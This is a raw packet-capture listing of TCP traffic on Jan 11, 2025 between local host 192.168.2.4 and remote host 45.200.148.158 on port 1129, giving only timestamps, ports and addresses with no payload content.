Jan 11, 2025 20:26:06.110215902 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110246897 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110269070 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.110279083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110311985 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110327959 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.110821962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110855103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110872984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.110887051 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110918999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110929966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.110951900 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110982895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.110996962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111015081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111046076 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111059904 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111078024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111112118 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111121893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111696959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111730099 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111746073 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111782074 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111814022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111829996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111846924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111877918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111891031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111910105 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111943007 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.111958027 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.111974001 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.112006903 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.112018108 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.142589092 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.142637968 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.142678022 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.142712116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.142808914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.142829895 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.142900944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.142951012 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.143018961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.143049955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.143080950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.143096924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.195525885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195581913 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.195624113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195657015 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195698977 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.195753098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195867062 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195902109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.195918083 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196063042 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196095943 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196121931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196127892 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196173906 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196271896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196304083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196336031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196351051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196602106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196634054 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196647882 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196666002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196712017 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196883917 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196916103 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196949005 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.196969986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.196996927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197030067 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197041988 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.197062969 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197093964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197104931 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.197552919 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197583914 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197597027 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.197616100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197649002 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197658062 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.197680950 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197714090 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197725058 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.197746038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.197839022 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.198230982 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198262930 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198293924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198313951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.198326111 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198358059 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198375940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.198389053 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198421955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.198431969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.198983908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199016094 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199035883 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199047089 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199079037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199090958 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199110031 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199141979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199155092 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199173927 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199209929 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199217081 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199721098 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199753046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199767113 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199784994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199816942 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199831963 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199847937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199881077 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199889898 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.199912071 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199944019 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.199955940 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.200556040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200587988 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200612068 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.200635910 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200668097 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200679064 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.200747013 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200778961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200794935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.200810909 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.200856924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.201209068 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201241016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201272964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201287031 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.201304913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201335907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201355934 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.201366901 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201397896 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201410055 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.201430082 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.201473951 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.202085972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202119112 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202150106 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202163935 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.202182055 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202214003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202225924 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.202245951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202276945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202308893 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202311993 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.202339888 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202351093 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.202960014 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.202991962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203005075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203039885 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203073025 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203089952 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203104973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203135967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203154087 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203166962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203197956 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203214884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203229904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203277111 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203886032 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203917980 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203950882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.203969002 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.203982115 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204013109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204030991 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204046011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204076052 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204092026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204108000 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204138994 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204150915 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204513073 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204546928 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204560041 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204580069 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204612017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204622984 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204643965 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204675913 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204689980 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.204706907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204740047 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.204749107 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.233328104 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233381987 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.233395100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233409882 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233454943 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.233561993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233604908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233684063 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.233706951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233721972 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233736038 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.233778954 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286257029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286315918 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286330938 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286367893 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286550999 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286566973 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286593914 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286648035 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286662102 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286701918 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286855936 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286870003 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286885023 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286901951 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286911011 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286921024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.286933899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.286966085 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.287282944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287297964 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287319899 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287337065 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287348986 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.287352085 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287379026 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.287775993 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287794113 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287808895 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287820101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.287822962 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.287875891 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288060904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288075924 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288089037 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288104057 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288110971 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288141966 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288470984 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288485050 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288499117 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288512945 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288516045 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288527012 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288537025 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288541079 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288554907 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288558006 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288568020 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288583040 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.288594007 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.288628101 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.289175034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289354086 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289366961 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289387941 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289402008 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289407969 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.289416075 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289427996 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.289428949 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289443016 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289457083 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289469957 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289473057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.289473057 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.289484024 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.289504051 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.290175915 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290190935 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290204048 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290219069 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.290225029 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290240049 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290241003 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.290254116 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290267944 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290282011 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290285110 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.290294886 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290308952 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.290323019 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.290345907 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291136026 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291150093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291162968 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291176081 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291188955 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291203976 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291207075 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291241884 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291627884 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291642904 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291656017 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291670084 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291673899 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291682959 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291691065 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291697979 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291712046 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291724920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291737080 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291738033 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291752100 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.291758060 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.291780949 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.292496920 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292519093 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292531967 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292546034 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292558908 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292562962 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.292572975 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292587996 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292601109 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292601109 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.292614937 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292629004 CET	1129	49730	45.200.148.158	192.168.2.4
Jan 11, 2025 20:26:06.292634010 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.292668104 CET	49730	1129	192.168.2.4	45.200.148.158
Jan 11, 2025 20:26:06.293500900 CET	1129	49730	45.200.148.158	192.168.2.4
